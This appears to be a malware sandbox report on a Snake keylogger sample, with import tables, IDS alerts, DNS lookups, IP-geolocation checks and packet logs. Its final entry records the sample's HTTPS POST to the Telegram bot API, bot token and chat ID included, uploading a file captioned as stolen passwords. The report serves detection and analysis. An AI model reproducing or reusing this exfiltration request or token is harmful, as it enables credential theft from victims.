MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-17T11:09:40.070606+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49161	132.226.247.73	80	TCP
2025-03-17T11:09:46.217032+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49161	132.226.247.73	80	TCP
2025-03-17T11:09:46.712421+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.22	49163	149.154.167.220	443	TCP
2025-03-17T11:09:46.968357+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.22	49163	149.154.167.220	443	TCP

Network Port Distribution

Total Packets: 32
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 11:09:38.940457106 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:38.945120096 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:38.945218086 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:38.946794033 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:38.951463938 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:39.618871927 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:39.647978067 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:39.652802944 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:39.854804039 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:39.873298883 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:39.873342991 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:39.873430014 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:39.877861023 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:39.877876043 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.070605993 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:40.071459055 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:40.071564913 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:40.349121094 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.349235058 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:40.354361057 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:40.354374886 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.354840040 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.425414085 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:40.472326040 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.533129930 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.533196926 CET	443	49162	104.21.112.1	192.168.2.22
Mar 17, 2025 11:09:40.533252954 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:40.535520077 CET	49162	443	192.168.2.22	104.21.112.1
Mar 17, 2025 11:09:45.811121941 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:45.815870047 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:46.019241095 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:09:46.031341076 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.031382084 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.031451941 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.032159090 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.032167912 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.217031956 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:09:46.648231983 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.648319006 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.656245947 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.656253099 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.656554937 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.667249918 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.712316036 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.712362051 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.712368011 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.968339920 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.968430042 CET	443	49163	149.154.167.220	192.168.2.22
Mar 17, 2025 11:09:46.968467951 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:09:46.969052076 CET	49163	443	192.168.2.22	149.154.167.220
Mar 17, 2025 11:10:51.019860983 CET	80	49161	132.226.247.73	192.168.2.22
Mar 17, 2025 11:10:51.019937038 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:11:20.551553011 CET	49161	80	192.168.2.22	132.226.247.73
Mar 17, 2025 11:11:20.556348085 CET	80	49161	132.226.247.73	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 11:09:37.756031990 CET	54562	53	192.168.2.22	8.8.8.8
Mar 17, 2025 11:09:37.764164925 CET	53	54562	8.8.8.8	192.168.2.22
Mar 17, 2025 11:09:37.839934111 CET	54562	53	192.168.2.22	8.8.8.8
Mar 17, 2025 11:09:37.846168995 CET	53	54562	8.8.8.8	192.168.2.22
Mar 17, 2025 11:09:38.928704977 CET	52917	53	192.168.2.22	8.8.8.8
Mar 17, 2025 11:09:38.934889078 CET	53	52917	8.8.8.8	192.168.2.22
Mar 17, 2025 11:09:39.862629890 CET	62751	53	192.168.2.22	8.8.8.8
Mar 17, 2025 11:09:39.872725964 CET	53	62751	8.8.8.8	192.168.2.22
Mar 17, 2025 11:09:46.024574041 CET	57893	53	192.168.2.22	8.8.8.8
Mar 17, 2025 11:09:46.030904055 CET	53	57893	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2025 11:09:37.756031990 CET	192.168.2.22	8.8.8.8	0x24b8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.839934111 CET	192.168.2.22	8.8.8.8	0x24b8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:38.928704977 CET	192.168.2.22	8.8.8.8	0x47f3	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.862629890 CET	192.168.2.22	8.8.8.8	0xf83f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:46.024574041 CET	192.168.2.22	8.8.8.8	0xb9d3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2025 11:09:37.764164925 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 11:09:37.764164925 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.764164925 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.764164925 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.764164925 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.764164925 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.846168995 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 11:09:37.846168995 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.846168995 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.846168995 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.846168995 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:37.846168995 CET	8.8.8.8	192.168.2.22	0x24b8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:38.934889078 CET	8.8.8.8	192.168.2.22	0x47f3	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 11:09:38.934889078 CET	8.8.8.8	192.168.2.22	0x47f3	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:38.934889078 CET	8.8.8.8	192.168.2.22	0x47f3	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:38.934889078 CET	8.8.8.8	192.168.2.22	0x47f3	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:38.934889078 CET	8.8.8.8	192.168.2.22	0x47f3	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:38.934889078 CET	8.8.8.8	192.168.2.22	0x47f3	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:39.872725964 CET	8.8.8.8	192.168.2.22	0xf83f	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 11:09:46.030904055 CET	8.8.8.8	192.168.2.22	0xb9d3	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	132.226.247.73	80	3720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 11:09:38.946794033 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 17, 2025 11:09:39.618871927 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 10:09:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 17, 2025 11:09:39.647978067 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 17, 2025 11:09:39.854804039 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 10:09:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 17, 2025 11:09:40.071459055 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 10:09:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 17, 2025 11:09:45.811121941 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 17, 2025 11:09:46.019241095 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 10:09:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	104.21.112.1	443	3720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 10:09:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-17 10:09:40 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 10:09:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 57494 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Sun, 16 Mar 2025 18:11:25 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiGpqrTp3jPLrynXxjd%2BYWQGOKiMahvGegLoOlnKG%2BsSlkVR8L2J6IOx8JDo6Ag5uswJ5j2211%2BZzlJVySwIomgC6AsFc%2F7C8nX6teKvzuJDg4N1B4yGxwOuJ1VyhLSExI%2FjIPZ9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 921bb233f85042bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1578&rtt_var=598&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1821584&cwnd=223&unsent_bytes=0&cid=37061e3bae2beda6&ts=195&x=0"
2025-03-17 10:09:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	149.154.167.220	443	3720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 10:09:46 UTC	295	OUT	POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd651a7455f1ea Host: api.telegram.org Content-Length: 1089 Connection: Keep-Alive
